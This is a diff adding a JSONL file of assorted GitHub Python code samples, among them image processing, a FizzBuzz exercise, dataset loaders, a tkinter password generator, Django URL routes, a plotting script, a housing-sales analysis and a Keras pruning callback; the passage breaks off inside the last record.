diff --git "a/4812.jsonl" "b/4812.jsonl" new file mode 100644--- /dev/null +++ "b/4812.jsonl" @@ -0,0 +1,746 @@ +{"seq_id":"42638434885","text":"from numpy import *\nimport math\nimport numpy as np\nimport cv2\n\n\ndef calc_rect(p1_x, p1_y, p2_x, p2_y):\n yp1 = p1_y\n xp1 = p1_x\n yp2 = p2_y\n xp2 = p2_x\n lenAB = math.sqrt(math.pow(xp1 - xp2, 2) + math.pow(yp1 - yp2, 2))\n\n print(\"Length=%f\" % lenAB)\n\n totalLength = 200\n delta_xp = (math.fabs(xp2 - xp1) * (totalLength - lenAB) / 2) / lenAB\n delta_yp = (math.fabs(yp1 - yp2) * (totalLength - lenAB) / 2) / lenAB\n\n if (xp1 > xp2):\n kx = 1\n else:\n kx = -1\n\n if (yp1 > yp2):\n ky = 1\n else:\n ky = -1\n\n xp1_0 = xp1 + kx * delta_xp\n yp1_0 = yp1 + ky * delta_yp\n xp2_0 = xp2 - kx * delta_xp\n yp2_0 = yp2 - ky * delta_yp\n\n print(\"deltaXY=[%f,%f]\" % (delta_xp, delta_yp))\n print(\"p1=[%f,%f], p2=[%f,%f]\" % (xp1_0, yp1_0, xp2_0, yp2_0))\n\n intp1x = np.int0(xp1_0)\n intp1y = np.int0(yp1_0)\n intp2x = np.int0(xp2_0)\n intp2y = np.int0(yp2_0)\n print(\"point p1=[%d,%d], p2=[%d,%d]\" % (intp1x, intp1y, intp2x, intp2y))\n\n return intp1x, intp1y, intp2x, intp2y\n\n\n# 获取一个点阵集描述的曲线的两个端点,如果是封闭的,则不返回\ndef getTerminalPoint(x, y, edges):\n height, width = np.shape(edges)\n counter = 0\n if (y > 0) and (x > 0) and (edges[y - 1, x - 1] > 0):\n counter = counter + 1\n if (y > 0) and (edges[y - 1, x] > 0):\n counter = counter + 1\n if (y > 0) and (x < width) and (edges[y - 1, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (edges[y, x - 1] > 0):\n counter = counter + 1\n if (x < width) and (edges[y, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (y < height) and (edges[y + 1, x - 1] > 0):\n counter = counter + 1\n if (y < height) and (edges[y + 1, x] > 0):\n counter = counter + 1\n if (y < height) and (x < width) and (edges[y + 1, x + 1] > 0):\n counter = counter + 1\n return counter\n\n\n# 找圆的方法, 在相连的点内,不跨不相连的点\n# listPoints 连接的线的集合\n# minRadius 最小的半径\n# maxRadius 最大的半径 系统限制为100\n# width 线宽\n# minDistance 圆心之间的最小距离\n# imgWidth 图像的宽\n# imgHeight 图像的高\n# minPoints 最少包含的点\ndef findCircle(listPoints, minRadius, maxRadius, width, minDistance, imgWidth, imgHeight, minPoints):\n imgLabel = np.zeros((imgHeight, imgWidth), np.uint8)\n for y in range(imgHeight):\n print(\"total=%d, process y=%d\" % (imgHeight, y))\n for x in range(imgWidth):\n for radius in range(minRadius, maxRadius):\n imgTemp = np.zeros((imgHeight, imgWidth), np.uint8)\n cv2.circle(imgTemp, (x, y), radius, 255, width) # 画圆\n for points in listPoints:\n if len(points) < minPoints:\n continue\n for x, y in points:\n if imgTemp[y, x] > 0:\n imgLabel[y, x] += 1\n\n return imgLabel\n\n\n# 计算点的连通性\ndef connect(edges, x, y):\n height, width = edges.shape\n height = height - 1\n width = width - 1\n counter = 0\n if (y > 0) and (x > 0) and (edges[y - 1, x - 1] > 0):\n counter = counter + 1\n if (y > 0) and (edges[y - 1, x] > 0):\n counter = counter + 1\n if (y > 0) and (x < width) and (edges[y - 1, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (edges[y, x - 1] > 0):\n counter = counter + 1\n if (x < width) and (edges[y, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (y < height) and (edges[y + 1, x - 1] > 0):\n counter = counter + 1\n if (y < height) and (edges[y + 1, x] > 0):\n counter = counter + 1\n if (y < height) and (x < width) and (edges[y + 1, x + 1] > 0):\n counter = counter + 1\n return counter\n\n\n# 判断一个曲线是否是凸的\n# 在一个曲线的两端,在一个规定的矩形范围内,进行概率式的延展拟合和其他的曲线,找出一个凸的图形\n# calc_rect(549., 58.00000763, 521., 132.)\n\n\n# histogram统计\ndef calcAndDrawHist(image, 
color):\n hist = cv2.calcHist([image], [0], None, [256], [1.0, 255.0])\n minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(hist)\n histImg = np.zeros([256, 256, 3], np.uint8)\n hpt = int(0.9 * 256)\n\n for h in range(256):\n intensity = int(hist[h] * hpt / maxVal)\n cv2.line(histImg, (h, 256), (h, 256 - intensity), color)\n\n return histImg\n","repo_name":"OldJ2010/fruitrecognize","sub_path":"mylib.py","file_name":"mylib.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16556598204","text":"# Fizz Buzz\n# For a given range example 1 to 50\n# For multiples of 3 insert Fizz in the list\n# For multiples of 5 insert Buzz in the list\n# For multiples of 3 & 5 insert FizzBuzz\n# return the list\n#\n# Learnings: Mutliples of 3 and 5 can be found by doing % 15 and would save one if condition\n\n#Function to validate input type and to check if input greater than one.\ndef processInput(input):\n inputType = type(input)\n print(inputType)\n if(str(inputType) == \"\"):\n print(\"valid input\")\n else:\n print(\"invalid input\")\n #raise Exception(\"Sorry, invalid input\")\n exit()\n if(input < 1):\n print(\"Invalid input\", + input)\n exit()\n\n\ndef fizzBuzz(iprange):\n processInput(iprange)\n myList = []\n for input in range(1,iprange):\n if(input%15 == 0):\n #print(\"FizzBuzz\", end =\" \")\n myList.append(\"FizzBuzz\")\n continue\n elif(input%5 == 0):\n #print(\"Buzz\", end =\" \")\n myList.append(\"Buzz\")\n continue\n elif(input%3 == 0):\n #print(\"Fizz\", end =\" \")\n myList.append(\"Fizz\")\n continue\n else:\n #print(input, end =\" \")\n myList.append(input)\n return myList\n\n#Vary the inputs(normal scenarios and boundary scenarios) example: -1 , 0 , \"hello\" , 1.49 etc\nresult = fizzBuzz(25)\nprint(len(result))\nfor x in range(len(result)):\n print(x, end =\" \")\n print(result[x], end =\" \")\n\n\"\"\"\n#Profiling info\nimport cProfile\ncProfile.run('fizzBuzz(10000000)')\n\n 10000006 function calls in 3.848 seconds\n\n Ordered by: standard name\n\n ncalls tottime percall cumtime percall filename:lineno(function)\n 1 0.073 0.073 3.848 3.848 :1()\n 1 0.000 0.000 0.001 0.001 fizzBuzzType1v1.py:11(processInput)\n 1 2.802 2.802 3.775 3.775 fizzBuzzType1v1.py:25(fizzBuzz)\n 1 0.000 0.000 3.848 3.848 {built-in method builtins.exec}\n 2 0.001 0.000 0.001 0.000 {built-in method builtins.print}\n 9999999 0.972 0.000 0.972 0.000 {method 'append' of 'list' objects}\n 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}\n \"\"\"\n","repo_name":"prithvibv/python","sub_path":"DSA/Arrays/FizzBuzz/fizzBuzzType1v1.py","file_name":"fizzBuzzType1v1.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14464222235","text":"from torch.utils.data import Dataset\nimport h5py\nfrom torchvision.transforms import functional\nimport torchvision.transforms as transforms\n\n\nclass ODOC(Dataset):\n \"\"\" ODOC Dataset \"\"\"\n def __init__(self, base_dir=None, split='test'):\n self._base_dir = base_dir\n self.sample_list = []\n test_path = self._base_dir + '/' + str(split) + '.list'\n with open(test_path, 'r') as f:\n self.image_list = f.readlines()\n\n self.image_list = [item.replace('\\n', '') for item in self.image_list]\n\n self.test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ])\n\n def __len__(self):\n 
return len(self.image_list)\n\n def __getitem__(self, idx):\n image_name = self.image_list[idx]\n h5f = h5py.File(self._base_dir + '/h5py_all' + '/'+image_name, 'r')\n image = self.test_transform(h5f['img'][:])\n label = functional.to_tensor(h5f['mask'][:])\n con_gau = functional.to_tensor(h5f['con_gau'][:])\n sample = {'img': image, 'mask': label, 'con_gau': con_gau}\n return sample, image_name\n\n\n","repo_name":"smallmax00/Graph_Region_Boudnary","sub_path":"utils/Dataloader_ODOC.py","file_name":"Dataloader_ODOC.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"70436499613","text":"import pandas as pd\nimport re\n\nif __name__ == '__main__':\n # ----------------Read Data----------------\n data_path = \"./output/sub_trim_2k.csv\"\n sample_path = \"./input/validation.csv\"\n ss_path = \"./output/eupt_sample_submission.csv\"\n raw_data = pd.read_csv(data_path, encoding=\"utf-8\")\n sample_data = pd.read_csv(sample_path, encoding=\"utf-8\", header=0, usecols=[0])\n ss_data = pd.read_csv(ss_path, encoding=\"utf-8\", header=0, usecols=[0])\n\n # print(sample_data.columns.tolist())\n # print(sample_data.head(5))\n print(len(sample_data))\n print(len(raw_data))\n print(len(ss_data))\n\n columns = raw_data.columns.tolist()\n\n lst = []\n for i in range(len(raw_data)):\n lst.append(raw_data.iloc[i].values.tolist())\n\n index = []\n\n for i in range(len(lst)):\n # print(type(lst), type(lst[i]))\n index.append(lst[i].index(max(lst[i])))\n # print(i, index[i], max(lst[i]))\n\n predict = []\n for i in range(len(index)):\n predict.append(columns[index[i]])\n\n print(len(predict))\n\n for i in range(len(predict)):\n predict[i] = re.sub(\"[Label_]\", \"\", predict[i])\n\n result = pd.DataFrame(predict, columns=[\"PREDICT\"])\n result = pd.concat([sample_data[\"id\"], result], axis=1)\n result.to_csv(\"./output/result_old.csv\", index=False, encoding=\"utf-8\", header=None)\n print(\"Done!\\n\")\n","repo_name":"dhr1676/SMP-EUPT-2018","sub_path":"ding_accuracy.py","file_name":"ding_accuracy.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42945051669","text":"import tkinter as tk\r\nimport module.useful_fct as use\r\nfrom module.pwGen import GenPw\r\nimport re\r\n\r\nBG = \"#333333\"\r\nFG = \"#FFFFFF\"\r\nFONT10 = (\"Helvetica\",10)\r\nFONT20 = (\"Helvetica\",20)\r\n\r\nL10PARAM = {\r\n \"bg\" : BG,\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10)\r\n}\r\nL20PARAM = {\r\n \"bg\" : BG,\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",20)\r\n}\r\nBPARAM = {\r\n \"bg\" : \"#555555\",\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10),\r\n \"relief\" : \"raised\",\r\n}\r\nEPARAM = {\r\n \"bg\" : \"#555555\",\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10),\r\n}\r\nPACK = {\r\n \"padx\" : 8,\r\n \"pady\" : 8\r\n}\r\n\r\nclass UI():\r\n def __init__(self) -> None:\r\n self.root = tk.Tk()\r\n self.root.title(\"Password Generator\")\r\n self.root.config(bg=BG)\r\n self.root.iconbitmap(\"assets/cadenas.ico\")\r\n self.root.bind(\"\", self.exit)\r\n self.generator = GenPw()\r\n self.generated_pw = \"Generate a password\"\r\n\r\n self.display_menu()\r\n\r\n def display_menu(self):\r\n use.clear(self.root)\r\n \r\n title = tk.Label(self.root, text=\"Password Generator\", **L20PARAM)\r\n title.pack()\r\n\r\n buttonFrame = tk.Frame(self.root, bg=BG)\r\n buttonFrame.pack()\r\n\r\n sub1Frame = 
tk.Frame(buttonFrame, bg=BG)\r\n sub1Frame.pack(side=\"left\")\r\n\r\n self.lower_B = tk.Label(sub1Frame, text=\"Lowercase\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.lower_B.bind(\"\", self.toggle_label_color)\r\n self.lower_B.pack(**PACK)\r\n self.upper_B = tk.Label(sub1Frame, text=\"Uppercase\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.upper_B.bind(\"\", self.toggle_label_color)\r\n self.upper_B.pack(**PACK)\r\n\r\n sub2Frame = tk.Frame(buttonFrame, bg=BG)\r\n sub2Frame.pack(side=\"right\")\r\n\r\n self.digit_B = tk.Label(sub2Frame, text=\"Digit\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.digit_B.bind(\"\", self.toggle_label_color)\r\n self.digit_B.pack(**PACK)\r\n self.punct_B = tk.Label(sub2Frame, text=\"Special char\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.punct_B.bind(\"\", self.toggle_label_color)\r\n self.punct_B.pack(**PACK)\r\n\r\n lengthFrame = tk.Frame(self.root, bg=BG)\r\n lengthFrame.pack()\r\n\r\n subLeftFrame = tk.Frame(lengthFrame, bg=BG)\r\n subLeftFrame.pack(side=\"left\")\r\n\r\n length_L = tk.Label(subLeftFrame, text=\"Length :\", **L10PARAM)\r\n length_L.pack(side=\"right\")\r\n\r\n subRightFrame = tk.Frame(lengthFrame, bg=BG)\r\n subRightFrame.pack(side=\"right\")\r\n\r\n self.legnth_E = tk.Entry(subRightFrame, **EPARAM)\r\n self.legnth_E.insert(0, \"10\")\r\n self.legnth_E.pack(side=\"left\", **PACK)\r\n\r\n genFrame = tk.Frame(self.root, bg=BG)\r\n genFrame.pack(fill=\"x\", expand=True)\r\n\r\n generate_B = tk.Button(genFrame, text=\"Generate\", **BPARAM, width=10, command=self.generation)\r\n generate_B.pack(**PACK)\r\n\r\n self.result_L = tk.Entry(genFrame, **EPARAM, width=30)\r\n self.result_L.insert(0, self.generated_pw)\r\n self.result_L.pack(fill=\"x\", expand=True, **PACK)\r\n\r\n saveFrame = tk.Frame(self.root, bg=BG)\r\n saveFrame.pack()\r\n\r\n sub10Frame = tk.Frame(saveFrame, bg=BG)\r\n sub10Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n save_L = tk.Label(sub10Frame, text=\"Label : \", **L10PARAM)\r\n save_L.pack()\r\n\r\n sub11Frame = tk.Frame(saveFrame, bg=BG)\r\n sub11Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n self.save_E = tk.Entry(sub11Frame, **EPARAM)\r\n self.save_E.insert(0, \"ID tag\")\r\n self.save_E.bind(\"\", self.save)\r\n self.save_E.pack()\r\n\r\n sub12Frame = tk.Frame(saveFrame, bg=BG)\r\n sub12Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n save_B = tk.Button(sub12Frame, text=\"Save\", **BPARAM, command=self.save)\r\n save_B.pack(padx=10)\r\n\r\n botFrame = tk.Frame(self.root, bg=BG)\r\n botFrame.pack(fill=\"x\", expand=True)\r\n\r\n sub20Frame = tk.Frame(botFrame, bg=BG)\r\n sub20Frame.pack(fill=\"x\", expand=True)\r\n\r\n history_B = tk.Button(sub20Frame, text=\"History\", **BPARAM, command=self.history_display)\r\n history_B.pack()\r\n\r\n sub21Frame = tk.Frame(botFrame, bg=BG)\r\n sub21Frame.pack(fill=\"x\", expand=True)\r\n\r\n exit_B = tk.Button(sub21Frame, text=\"Exit\", **BPARAM, command=self.exit)\r\n exit_B.pack(side=\"right\")\r\n\r\n use.set_geometry(self.root, 100, 50)\r\n\r\n def history_display(self):\r\n use.popup(self.root, self.generator.get(),\"History\",font=FONT10)\r\n\r\n def generation(self):\r\n self.generator.set_attr((self.lower_B.cget(\"bg\")==\"#00DD00\"),(self.upper_B.cget(\"bg\")==\"#00DD00\"),(self.digit_B.cget(\"bg\")==\"#00DD00\"),(self.punct_B.cget(\"bg\")==\"#00DD00\"))\r\n try:\r\n length = int(self.legnth_E.get())\r\n except:\r\n length = 10\r\n self.generated_pw = self.generator.generate_pw(length)\r\n 
self.result_L.delete(0,\"end\")\r\n self.result_L.insert(0,self.generated_pw)\r\n\r\n def save(self, e=None):\r\n pw = self.result_L.get()\r\n tag = re.match(\"^[a-zA-Z0-9]+$\",self.save_E.get())\r\n if tag is not None:\r\n self.generator.save_pw(pw,tag[0])\r\n use.popup(self.root,\"Password Saved Successful\", \"Save Message\", BG, FG, FONT10)\r\n else:\r\n use.popup(self.root,\"Password Saved Failed\", \"Save Message\", BG, FG, FONT10)\r\n\r\n def toggle_label_color(self, evt) -> None:\r\n label = evt.widget\r\n current_color = label.cget(\"background\")\r\n\r\n if current_color == \"#00DD00\":\r\n label.config(bg=\"#DD0000\")\r\n else:\r\n label.config(bg=\"#00DD00\")\r\n\r\n def run(self):\r\n self.root.mainloop()\r\n\r\n def exit(self, e=None):\r\n self.root.destroy()","repo_name":"Baltemor369/password-generator","sub_path":"mdp_generator/module/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26906771505","text":"import cv2\nimport numpy as np\n\norg_img = cv2.imread('test.png')\n\nimg_h = org_img.shape[0]\nimg_w = org_img.shape[1]\n\nbayer_array = np.zeros((img_h, img_w), dtype = np.uint8)\n\nbayer_img = np.zeros((img_h*2, img_w*2, 3), dtype=np.uint8)\n\nrgb_image = np.zeros((img_h, img_w, 3), dtype = np.uint8)\n\n#Bayer layer\n#BGBGBGBG......\n#GRGRGRGR......\n#BGBGBGBG......\n#GRGRGRGR......\n\ndef rgb_2_bayer():\n bayer_img[::2, ::2, 0] = org_img[:, :, 0]\n bayer_img[1::2, ::2, 1] = org_img[:, :, 1]\n bayer_img[::2, 1::2, 1] = org_img[:, :, 1]\n bayer_img[1::2, 1::2, 2] = org_img[:, :, 2]\n\n cv2.imwrite(\"bayer_img.png\", bayer_img)\n\ndef bayer_hex():\n for i in range(img_h):\n for j in range(img_w):\n if (i % 2 == 0):\n if (j % 2 == 0):\n bayer_array[i, j] = org_img[i, j, 0]\n else:\n bayer_array[i, j] = org_img[i, j, 1]\n else:\n if (j % 2 == 0):\n bayer_array[i, j] = org_img[i, j, 1]\n else:\n bayer_array[i, j] = org_img[i, j, 2]\n file =open('bayer_hex.hex','w')\n for e in bayer_array.flatten():\n file.write(format(e, 'x') +'\\n')\n file.close()\n\ndef bayer_2_rgb():\n bayer_array2 = np.zeros((img_h+2, img_w+2))\n bayer_array2[1:-1, 1:-1] = bayer_array\n \n for i in range(img_h):\n for j in range(img_w):\n m = bayer_array2[i:i+3, j:j+3].flatten()\n \n if (i % 2 == 0):\n if (j % 2 == 0):\n r = int((m[0] + m[2] + m[6] + m[8]) / 4)\n g = int((m[1] + m[3] + m[5] + m[7]) / 4)\n b = int(m[4])\n else:\n r = int((m[1] + m[7]) / 2)\n g = int(m[4])\n b = int((m[3] + m[5]) / 2)\n rgb_image[i, j, :] = [b, g, r]\n else:\n if (j % 2 == 0):\n r = int((m[3] + m[5]) / 2)\n g = int(m[4])\n b = int((m[1] + m[7]) / 2)\n else:\n r = int(m[4])\n g = int((m[1] + m[3] + m[5] + m[7]) / 4)\n b = int((m[0] + m[2] + m[6] + m[8]) / 4)\n rgb_image[i, j, :] = [b, g, r]\n cv2.imwrite(\"rgb_image.png\", rgb_image)\n\ndef desplay_img(img):\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nrgb_2_bayer()\nbayer_hex()\nbayer_2_rgb()\ndesplay_img(org_img)\n","repo_name":"hoikeung/cyclone_v_edge_detection","sub_path":"testbench/python_script/bayer_2_rgb.py","file_name":"bayer_2_rgb.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11229295399","text":"from xml.etree.ElementInclude import include\nfrom django.urls import path\nfrom sms import views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\n\nurlpatterns = [\n 
path('',views.home,name=\"home\"),\n path('about/',views.about_us,name=\"about\"),\n path('staff/',views.staff, name=\"staff\"),\n path('contacts/',views.contacts,name=\"contacts\"),\n path('students/',views.students,name=\"students\"),\n path('applycourse/',views.applycourse,name=\"applycourse\"),\n path('approve/',views.approve,name=\"approve\"),\n path('Disapprove/',views.Disapprove,name=\"Disapprove\"),\n path('register/',views.register,name=\"register\"),\n path('student_home/',views.student_home,name=\"student_home\"),\n path('registered_student/',views.registered_student,name=\"registered_student\"),\n path('approvedstudents/',views.approvedstudents,name=\"approvedstudents\"),\n path('search/',views.search,name=\"search\"),\n path('delete/',views.delete,name=\"delete\"),\n # path('profile/',views.profile,name=\"profile\"), \n path('adminpage/',views.adminpage,name=\"adminpage\"),\n path('studentspdf/',views.studentspdf,name=\"studentspdf\"),\n path('students_pdf/',views.students_information,name=\"students_pdf\"),\n\n\n\n \n \n]","repo_name":"Pkiach/sms","sub_path":"sms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23068359395","text":"import numpy as np\nimport json\n\n\nclass Continuity:\n def __init__(self, inst, qttPatient, qttCaregiver):\n self.file = 'data/Instances/Instance_' + inst + '/Continuity.json'\n with open(self.file, 'r') as f:\n data = json.load(f)['fidelity']\n self.continuity = np.zeros((qttPatient, qttCaregiver))\n for idPatient, info in data.items():\n for idCaregiver, score in info.items():\n self.continuity[int(idPatient), int(idCaregiver)] = score\n\n def getScore(self, idPatient, idCaregiver):\n return self.continuity[idPatient, idCaregiver]\n","repo_name":"filipesouzacit/GNN-LNS-HHCDP","sub_path":"classes/Continuity.py","file_name":"Continuity.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21724706903","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nimport pandas as pd \n\ndf = pd.read_csv(\"./example/models/CD8-CD4-NK_C0C1C2C3C4C5_valid20_gridSearch/gridsearchResults.csv\")\n\n\ndata = [\n go.Parcoords(\n line = dict(color = df['mean_test_f1'],\n colorscale = 'Jet',\n showscale = True,\n reversescale = False,\n cmin = 0.92,\n cmax = 0.95),\n dimensions = list([\n dict(tickvals = [1,2,3],\n label = 'conv_layer_sizes', values = df['conv_layer_sizes'],\n ticktext = ['[32, 32]', '[32, 64]', '[64, 64]']),\n dict(\n tickvals = [1,2],\n label = 'dense_layer_sizes', values = df['dense_layer_sizes'],\n ticktext = ['[64]', '[128]']),\n dict(\n tickvals = [0.25,0.5],\n label = 'dropout', values = df['param_dropout'],\n ticktext = ['0.25', '0.5']),\n dict(\n tickvals = [3,5],\n label = 'kernel_size', values = df['param_kernel_size'],\n ticktext = ['3', '5']),\n dict(\n tickvals = [2],\n label = 'pool_size', values = df['param_pool_size'],\n ticktext = ['2']), \n dict(range=[0.87,1],\n label = 'mean_test_accuracy', values = df['mean_test_accuracy']),\n dict(range=[0.87,1],\n label = 'mean_train_f1', values = df['mean_train_f1']),\n dict(range=[0,1],\n label = 'std_test_f1', values = df['std_test_f1']),\n dict(range=[0.87,1],\n label = 'mean_test_f1', values = df['mean_test_f1']),\n\n\n ])\n )\n]\n\n\n# data = [\n# 
go.Parcoords(\n# line = dict(color = df['species_id'],\n# colorscale = [[0,'#D7C16B'],[0.5,'#23D8C3'],[1,'#F3F10F']]),\n# dimensions = list([\n# dict(range = [0,8],\n# constraintrange = [4,8],\n# label = 'Sepal Length', values = df['sepal_length']),\n# dict(range = [0,8],\n# label = 'Sepal Width', values = df['sepal_width']),\n# dict(range = [0,8],\n# label = 'Petal Length', values = df['petal_length']),\n# dict(range = [0,8],\n# label = 'Petal Width', values = df['petal_width'])\n# ])\n# )\n# ]\n\nlayout = go.Layout(\n plot_bgcolor = '#E5E5E5',\n paper_bgcolor = '#E5E5E5'\n)\n\nfig = go.Figure(data = data, layout = layout)\nplot(fig, filename = 'parcoords-basic.html')","repo_name":"nmichiels/cifAnalysis","sub_path":"parallelChart.py","file_name":"parallelChart.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32204868988","text":"\n\"\"\"\nCreated on Wed Dec 9 22:36:45 2020\n\n@author: kiransyed\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = 10,5\nimport seaborn as sb\n\ndf = pd.read_csv(\"AllBoroughs2012-2019.csv\")\nprint(df.head())\n\nprint(df.info())\n\ncols = ['SALE PRICE',\n 'GROSS SQUARE FEET',\n 'LAND SQUARE FEET',\n 'TOTAL UNITS',\n 'COMMERCIAL UNITS',\n 'RESIDENTIAL UNITS']\n\nfor col in cols:\n df[col] = df[col].apply(lambda x: str(x).replace(\"-\",\"\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\"$\",\"\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\"nan\",\"0\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\",\",\"\").strip())\n\nfor col in cols:\n df[col] = pd.to_numeric(df[col])\n\ndf['SALE DATE'] = pd.to_datetime(df['SALE DATE'])\n\nprint(df.info())\n\nprint(df.isna().sum())\n\ndf.corr()['SALE PRICE'].index\nplt.bar(df.corr()['SALE PRICE'].index, df.corr()['SALE PRICE'])\nplt.tight_layout()\nplt.xticks(rotation=90)\nplt.grid()\nplt.title(\"Correlation of Sale Price VS other Factors\", size=24)\nplt.show()\n\nsb.heatmap(df.corr(),annot=True,cmap=\"YlGnBu\")\n\nprint(df['SALE DATE'].dt.year)\n\ndf.set_index(df['SALE DATE']).resample(\"Y\").sum()[\"SALE PRICE\"].plot()\nplt.title(\"SUM(SALE PRICE) vs YEAR\")\nplt.show()\n\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].plot()\nplt.title(\"SUM(SALE PRICE) vs MONTH\")\nplt.show()\n\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].plot()\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].rolling(10, win_type='gaussian').sum(std=0.5).plot()\nplt.title(\"SUM(SALE PRICE) vs MONTH\")\nplt.legend(['SUM SALE PRICE', 'ROLLING MEAN OF WINDOW 10'])\nplt.show()\n\nsb.scatterplot(df['BOROUGH'], df['SALE PRICE'])\nplt.xticks([1,2,3,4,5])\nplt.show()\n\nplt.figure(figsize=(30,5))\nsb.scatterplot(df['BUILDING CLASS CATEGORY'], df['SALE PRICE'])\nplt.xticks(rotation=90)\nplt.show()\n\n","repo_name":"alexandrachan7/CIS-9650-Group-1","sub_path":"Codes/A - Factors.py","file_name":"A - Factors.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73412073691","text":"import numpy as np\nimport tensorflow as tf\nimport utils.prune.helper\n\n\n\"\"\"\nMagnitude weight pruning schedule - Mask all weights that are within the threshold.\n\nEG: threshold = 0.1. 
ALl weights between -0.1 and 0.1 are masked with 0s\n\n\"\"\"\n\n\nclass schedule(tf.keras.callbacks.Callback):\n \n\n # Set pruning configuration\n def __init__(self, pruning_config):\n self.pruning_config = pruning_config\n self.mask_exists = False\n self.gradual_counter = 1\n self.valid_layers = 'dense'\n \n \n # Initialise pruning mask (0s of network shape)\n def create_ones_mask(self):\n \n masks = []\n for weights in self.model.get_weights():\n\n layer_mask = np.ones(weights.shape)\n masks.append(layer_mask)\n \n return masks\n \n \n # Update mask for weight vector based on new weights\n def get_layer_mask(self, weights, sparsity, ID):\n\n # Return locations where value is between bounds\n def abs_thresholding(data, sparsity):\n return np.where(np.abs(data) < sparsity)\n\n mask = np.ones(weights.shape)\n \n # If the layer is a valid layer to prune. Locate indexs to mask. Otherwise keep mask of 1s (no pruning)\n if utils.prune.helper._validate_layer(ID, self.valid_layers):\n locations = abs_thresholding(weights, sparsity)\n mask[locations] = 0\n \n return mask\n\n \n \n # Apply magnitude pruning schedule\n def apply_layer_mask(self, weights, mask):\n return weights * mask\n \n \n\n # Create new weight matrix using sparsity value. Return new weights and mask\n def get_masked_weights(self, sparsity):\n\n masks = []\n new_weights = []\n for layer, weights in zip(self.model.layers, self.model.get_weights()):\n\n\n layer_mask = self.get_layer_mask(weights, sparsity, layer.name)\n masks.append(layer_mask)\n\n pruned_weights = self.apply_layer_mask(weights, layer_mask)\n new_weights.append(pruned_weights)\n\n return new_weights, masks \n \n \n \n # Prune at the beginning of each epoch\n def on_epoch_begin(self, epoch, logs=None):\n \n\n # If the threshold is 0 -- ignore and dont prune\n if self.pruning_config['threshold'] != 0 and epoch >= self.pruning_config['epoch_threshold']:\n \n \n # Creates a static mask in one shot\n if self.pruning_config['function'] == 'one_shot_static':\n \n if self.mask_exists:\n masks = self.model.masks \n sparsity = self.pruning_config['threshold']\n \n else:\n sparsity = self.pruning_config['threshold']\n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n self.mask_exists = True\n \n \n # Creates a new mask each epoch\n elif self.pruning_config['function'] == 'one_shot':\n \n sparsity = self.pruning_config['threshold']\n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n \n \n \n \n # Gradual convergence results in a static mask\n elif self.pruning_config['function'] == 'gradual':\n \n sparsity = self.pruning_config['threshold'] * (self.gradual_counter / self.pruning_config['converge_over'])\n self.gradual_counter += 1\n \n if sparsity > self.pruning_config['threshold']:\n sparsity = self.pruning_config['threshold']\n \n if self.mask_exists:\n masks = self.model.masks \n \n else:\n \n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n \n # If we have hit max pruning -- keep a static mask\n if sparsity == self.pruning_config['threshold']:\n self.mask_exists = True\n \n \n \n else:\n 